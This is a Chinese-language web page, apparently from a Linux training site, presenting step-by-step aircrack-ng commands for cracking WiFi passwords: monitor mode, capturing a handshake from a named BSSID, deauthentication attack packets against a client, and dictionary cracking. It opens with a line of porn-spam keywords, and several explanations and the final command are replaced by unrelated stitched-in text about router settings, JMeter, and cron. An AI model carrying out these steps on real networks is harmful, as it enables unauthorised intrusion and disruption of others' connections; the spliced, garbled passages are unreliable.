中文字幕亚洲第一精品|精品国产免费一区二区|久久婷婷五月六月综合版|中文字幕熟妇久久久人妻|久久综合精品国产一区无码|国产成人精品永久免费视频|午夜亚洲国产精品理论片a级|久久精品一区二区三区无码护土

 訪問手機版  

Linux常用命令|Linux培訓學習|考試認證|工資待遇與招聘,認準超級網工!

招聘|合作 登陸|注冊

網絡工程師培訓

當前位置:網絡工程師 > 技術課程 > linux > 熱點關注 > linux常用命令

Kali Linux 破解WIFI密碼詳細步驟及命令講解

時間:2019-08-04

linux命令大全_linux命令分類大全_linux命令大全 ssh

?示例詳細步驟及命令:

1.ifconfig

2.iwconfig

3.ifconfig wlan0 down

4.iwconfig wlan0 mode monitor

5.ifconfig wlan0 up

6.iwconfig

7.airmon-ng start wlan0

8.airodump-ng mon0

9.airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0

10.aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0

linux命令大全 ssh_linux命令分類大全_linux命令大全

11.aircrack-ng -w /root/Desktop/zidian.txt test-01.cap

詳細解說:

1:查看網卡

ifconfig

2:查看網卡工作模式

iwconfig

3:關閉網卡

示例命令:

ifconfig wlan0 down

命令部分注釋如下:

ifconfig wlan0(選擇網卡) down

linux命令大全 ssh_linux命令分類大全_linux命令大全

4:更改網卡模式為monitor模式

示例命令:

iwconfig wlan0 mode monitor

命令部分注釋如下:

iwconfig wlan0(選擇網卡) mode monitor

5:啟動網卡

示例命令:

ifconfig wlan0 up

命令部分注釋如下:

ifconfig wlan0(選擇網卡) up

6:查看網卡工作模式

linux命令大全 ssh_linux命令分類大全_linux命令大全

iwconfig

7:啟動airmon-ng開啟網卡監(jiān)聽模式

示例命令:

airmon-ng start wlan0

命令部分注釋如下:

airmon-ng start wlan0(選擇網卡)

8:掃描無線網絡

airodump-ng mon0

9:開始抓包

示例命令:

airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0

linux命令大全_linux命令分類大全_linux命令大全 ssh

命令部分注釋如下:

在無線網絡中通信的時候,我們抓包的時候可能會看到被抓取的包對應ap的mac地址是不存在的,其實抓包時ap的mac是bssid,它和實際標注的mac地址不一定一樣(但是一般都差不多,也就是之后最后面的幾位不一樣)。勾選【開啟wds】,在【(橋接的)ssid】中填寫主路由器的ssid,在【(橋接的)bssid】中填寫主路由器的無線mac地址,【密鑰類型】選擇wpa2-psk。l 啟用無線: 如果啟用無線,隱藏訪問點,ssid,bssid,信道,54g?速率,多播速率,54g?模式,發(fā)送功率,將會顯示出來。

10:發(fā)送流量攻擊包

aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0

命令部分注釋如下:

2、如果有新的無線設備需要連接無線wifi上網,只需要先查看該無線設備的mac地址,并把這個mac地址添加到路由器上的“無線mac地址過濾”規(guī)則下面即可。查看無線mac地址,首先我們需要獲取ap1和ap2這2臺路由器的無線mac地址linux命令大全,注意:這里是獲取的無線mac地址,不是lan或者wan口的mac地址。l 檢查路由器是否設置無線mac地址過濾,使用網線連接路由器進入管理界面,打開無線設置—無線mac地址過濾查看,如果啟用,可以關閉或者添加該無線網卡的mac地址。

11:若抓包失敗,則運行該條命令,從8~10步開始執(zhí)行(此步驟可不執(zhí)行)

rm -r test-01.*

命令部分注釋如下:

rm -r test(自己定義的網絡抓包的名字)-0*(*為1—9的數(shù)字,例如:01、02、03等,自己定義的網絡抓包的名字+0*.cap 即為握手包名).*

12:開始破解WIFI密碼

${__stringfromfile(c:\users\root\desktop\apache-jmeter-2.9\test.txt,,,)}。01 * * * * test mail -s test test < /home/test/test/test.txt。[root@localhostsamba]# echo "this is test" > /opt/test/test.txt。

命令部分注釋如下:

aircrack-ng -w /root/Desktop/zidian.txt(字典存放的完整路徑) test(自己定義的網絡抓包的名字)-0*(*為1—9的數(shù)字,按tab鍵會顯示出來linux命令大全,若不出來,則用ls查看已抓到的握手包是哪個).cap(自己定義的網絡抓包的名字+0*.cap)